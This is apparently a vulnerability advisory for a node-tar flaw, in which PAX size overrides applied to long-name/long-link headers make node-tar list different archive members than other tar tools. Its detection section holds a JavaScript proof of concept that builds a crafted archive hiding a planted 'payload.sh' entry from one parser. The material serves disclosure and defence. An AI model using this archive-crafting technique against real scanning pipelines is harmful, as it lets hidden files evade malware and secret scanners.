CVE-2026-53655
Status: Received - Intake
Tar Parser Interpretation Differential in node-tar (PAX size override applied to intermediary L/K headers)

Publication date: 2026-06-22

Last updated on: 2026-06-22

Assigner: GitHub, Inc.

Description
node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates.

Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools.

An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another). This vulnerability is fixed in 7.5.16.
CVSS Scores: none listed
EPSS Scores: not evaluated (N/A)
Affected Vendors & Products (1 associated CPE)
Vendor: isaacs
Product: node-tar
Version / Range: all versions before 7.5.16 (7.5.16 itself is excluded from the affected range)
CWE-436 (Interpretation Conflict): Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
Executive Summary

CVE-2026-53655 affects the node-tar library, specifically versions 7.5.15 and earlier. The vulnerability arises because node-tar incorrectly applies PAX extended header size overrides to intermediary metadata headers (such as GNU long-name or long-link headers) instead of only to the subsequent file entry as required by POSIX pax standards.

This causes a desynchronization in node-tar's stream cursor compared to other mainstream tar implementations like GNU tar, libarchive/bsdtar, and Python tarfile. As a result, a crafted tar archive can appear differently when parsed by node-tar versus other tools, leading to a tar parser interpretation differential.

An attacker can exploit this in either direction: hide a member from a node-tar-based scanner while it remains visible to the tool that later extracts the archive, or hide a member from a GNU tar/libarchive-based scanner while node-tar extracts it. Either way, a pipeline whose scanner and extractor use different tar parsers can be made to pass a file it never inspected.

Impact Analysis

This vulnerability can impact you by allowing an attacker to craft a tar archive that is interpreted differently by node-tar compared to other tar tools. This means that security scanners or tools using node-tar might not detect certain files or malicious content hidden within the archive.

Such a discrepancy can be exploited to bypass malware or secret scanning tools that rely on node-tar, potentially allowing malicious files to be extracted or executed without detection.

The vulnerability affects the integrity of archive interpretation but does not enable direct remote code execution. Exploitation requires that an attacker-supplied tar archive be parsed by a vulnerable version of node-tar and that another step in the same pipeline rely on a different tar implementation; a pipeline that uses node-tar for both listing and extraction sees one consistent (if wrong) view of the archive and is not subject to the differential.

Detection Guidance

This vulnerability can be detected by analyzing tar archives processed by node-tar and comparing the reported archive members against those reported by other mainstream tar implementations such as GNU tar, libarchive/bsdtar, or Python tarfile.

A crafted tar archive that exploits this vulnerability will show a different set of members when parsed by node-tar compared to other tools.

To detect this on your system, you can extract or list the contents of suspicious tar archives using both node-tar and a reference tool like GNU tar and compare the outputs.

  • Use GNU tar to list archive contents: `tar -tf archive.tar` (`tar -tvf archive.tar` also prints each member's size, which is the field this bug shifts).
  • Use node-tar's `list` command (alias `t`) from a short Node.js script to list the same archive, then compare the two member lists name by name and size by size.

If the node-tar output shows fewer, more, or different members (or different sizes for the same member name) than GNU tar or another reference tool, the archive is exercising a parser differential and should be treated as hostile, whether or not this specific bug is the cause.
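The differential described in the Description and the comparison this section asks for, as an added example that is not code from node-tar or from this advisory. It implements a minimal 512-byte-block tar walker twice over the same in-memory archive: `listMembers(archive, false)` applies PAX records only to the next file entry (the POSIX pax rule), while `listMembers(archive, true)` emulates the pre-7.5.16 behaviour the advisory describes, applying the PAX size= override to whatever header comes next, including a K long-link header. The emulation (including the assumption that the override is consumed by the L/K header rather than carried on to the file) is inferred from the advisory text, not taken from node-tar's source; the "reference" walker implements the stated rule, not the full logic of GNU tar or libarchive. The sample archive is constructed inline and the function names `buildCraftedArchive`, `listMembers` and `differential` are this example's own.

```javascript
// Added example (not node-tar's code): two minimal 512-byte-block tar walkers.
// listMembers(..., false) applies PAX records only to the next file entry (POSIX pax rule);
// listMembers(..., true) emulates the pre-7.5.16 node-tar behaviour described in the advisory:
// the PAX size= override is applied to whatever header comes next, including L/K headers.
// The emulation is a simplification inferred from the advisory text, not node-tar's source.
const BLOCK = 512;

const octal = (n, len) => n.toString(8).padStart(len - 1, '0') + '\0';
const cstr = (buf) => { const i = buf.indexOf(0); return buf.toString('latin1', 0, i < 0 ? buf.length : i); };
const parseOctal = (buf) => parseInt(cstr(buf).trim() || '0', 8);

// Build one ustar header block with a valid checksum.
function header({ name, size, type, mode = 0o644 }) {
  const h = Buffer.alloc(BLOCK);
  h.write(name, 0, 100, 'latin1');
  h.write(octal(mode, 8), 100, 8, 'latin1');
  h.write(octal(0, 8), 108, 8, 'latin1');        // uid
  h.write(octal(0, 8), 116, 8, 'latin1');        // gid
  h.write(octal(size, 12), 124, 12, 'latin1');   // size field (a PAX size= record may override it)
  h.write(octal(0, 12), 136, 12, 'latin1');      // mtime
  h.write('        ', 148, 8, 'latin1');         // checksum field counts as spaces while summing
  h.write(type, 156, 1, 'latin1');
  h.write('ustar\0', 257, 6, 'latin1');
  h.write('00', 263, 2, 'latin1');
  let sum = 0;
  for (const b of h) sum += b;
  h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148, 8, 'latin1');
  return h;
}

function checksumOk(h) {
  let sum = 0;
  for (let i = 0; i < BLOCK; i++) sum += (i >= 148 && i < 156) ? 32 : h[i];
  return sum === parseOctal(h.subarray(148, 156));
}

const padded = (buf) => Buffer.concat([buf, Buffer.alloc((BLOCK - buf.length % BLOCK) % BLOCK)]);

// Parse "LEN key=value\n" records from an x header's data.
function parsePax(data) {
  const out = {}, s = data.toString('latin1');
  for (let i = 0; i < s.length;) {
    const sp = s.indexOf(' ', i), len = parseInt(s.slice(i, sp), 10);
    const rec = s.slice(sp + 1, i + len - 1), eq = rec.indexOf('=');
    out[rec.slice(0, eq)] = rec.slice(eq + 1);
    i += len;
  }
  if (out.size !== undefined) out.size = parseInt(out.size, 10);
  return out;
}

// Walk the archive and return the members a parser following the given rule would report.
function listMembers(archive, paxOverridesMetaHeaders) {
  const members = [];
  let pax = {}, longName = null, longLink = null;
  for (let off = 0; off + BLOCK <= archive.length;) {
    const h = archive.subarray(off, off + BLOCK);
    if (h.every((b) => b === 0)) break;                          // end-of-archive marker
    if (!checksumOk(h)) throw new Error(`bad header checksum at offset ${off}`);
    const type = h[156] === 0 ? '0' : String.fromCharCode(h[156]);
    const isMeta = type === 'x' || type === 'L' || type === 'K';
    let size = parseOctal(h.subarray(124, 136));
    if (pax.size !== undefined && (!isMeta || paxOverridesMetaHeaders)) {
      size = pax.size;                                           // PAX size= wins over the header field
      if (isMeta) pax = {};                                      // vulnerable path: consumed by the L/K header (assumption)
    }
    const data = archive.subarray(off + BLOCK, off + BLOCK + size);
    if (type === 'x') pax = parsePax(data);
    else if (type === 'L') longName = cstr(data);
    else if (type === 'K') longLink = cstr(data);
    else {
      members.push({ name: longName ?? cstr(h.subarray(0, 100)), type, size,
                     linkname: longLink ?? cstr(h.subarray(157, 257)), content: data.toString('latin1') });
      pax = {}; longName = longLink = null;
    }
    off += BLOCK + Math.ceil(size / BLOCK) * BLOCK;               // advance past header + padded data
  }
  return members;
}

// Constructed sample archive (not a real-world file): x(size=1024) -> K -> notes.txt -> legit.txt.
// The 1024 data bytes of notes.txt are themselves a complete, validly checksummed entry for
// payload.sh, which is exactly where the desynchronised cursor of the vulnerable walker lands.
function buildCraftedArchive() {
  const paxRecord = Buffer.from('13 size=1024\n', 'latin1');
  const longLink = Buffer.from('shared/' + 'a'.repeat(100) + '/target\0', 'latin1');
  const smuggled = Buffer.concat([header({ name: 'payload.sh', size: 5, type: '0', mode: 0o755 }),
                                  padded(Buffer.from('evil\n'))]);           // exactly 1024 bytes
  return Buffer.concat([
    header({ name: 'PaxHeader/notes.txt', size: paxRecord.length, type: 'x' }), padded(paxRecord),
    header({ name: '././@LongLink', size: longLink.length, type: 'K' }), padded(longLink),
    header({ name: 'notes.txt', size: smuggled.length, type: '0' }), smuggled,
    header({ name: 'legit.txt', size: 6, type: '0' }), padded(Buffer.from('hello\n')),
    Buffer.alloc(2 * BLOCK),
  ]);
}

// Differential check: members one parser reports that the other does not.
function differential(archive) {
  const describe = (m) => `${m.name} (${m.size} bytes)`;
  const reference = listMembers(archive, false).map(describe);
  const vulnerable = listMembers(archive, true).map(describe);
  return { reference, vulnerable,
           hiddenFromNodeTar: reference.filter((x) => !vulnerable.includes(x)),
           hiddenFromReference: vulnerable.filter((x) => !reference.includes(x)) };
}

console.log(differential(buildCraftedArchive()));
```

The reference walker reports `notes.txt` (1024 bytes) and `legit.txt`; the vulnerable walker, having consumed 1024 bytes for the K header, lands on the planted `payload.sh` header instead and never sees `notes.txt`. Both headers carry valid checksums, which is what a real attacker must arrange: a desynchronised cursor that lands on garbage simply errors out, while one that lands on a crafted header yields a clean but different member list. To compare against real tools rather than the emulation, write `buildCraftedArchive()` to disk with `require('fs').writeFileSync('crafted.tar', buildCraftedArchive())`, then list it with `tar -tvf crafted.tar` and with node-tar's `list` command on both a vulnerable and a fixed version.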

Mitigation Strategies

The immediate mitigation step is to upgrade node-tar to version 7.5.16 or later, where the vulnerability is fixed.

The fix makes node-tar apply a PAX extended header's size= record (and its other overrides) only to the file entry the x header describes, not to intervening L, K or x headers, so node-tar's stream cursor stays aligned with the reference implementations.

Until the upgrade can be applied, avoid processing untrusted or attacker-supplied tar archives with vulnerable versions of node-tar.

Additionally, consider listing untrusted archives with a second, independent tar implementation before extraction and rejecting any archive on which the two member lists (names and sizes) disagree; a disagreement indicates a parser differential regardless of which library is at fault.

Compliance Impact

This vulnerability allows an attacker to craft tar archives that are interpreted differently by node-tar compared to other mainstream tar implementations. As a result, files can be hidden from security scanners that rely on node-tar while still being extracted or visible by other tools.

Such discrepancies can undermine the effectiveness of security tooling designed to detect malware or sensitive data within archives, potentially leading to unauthorized data exposure or failure to detect malicious content.

In the context of compliance with standards like GDPR or HIPAA, this could mean that data protection measures relying on accurate scanning and extraction of archive contents might be bypassed, increasing the risk of non-compliance due to undetected data leaks or malware.
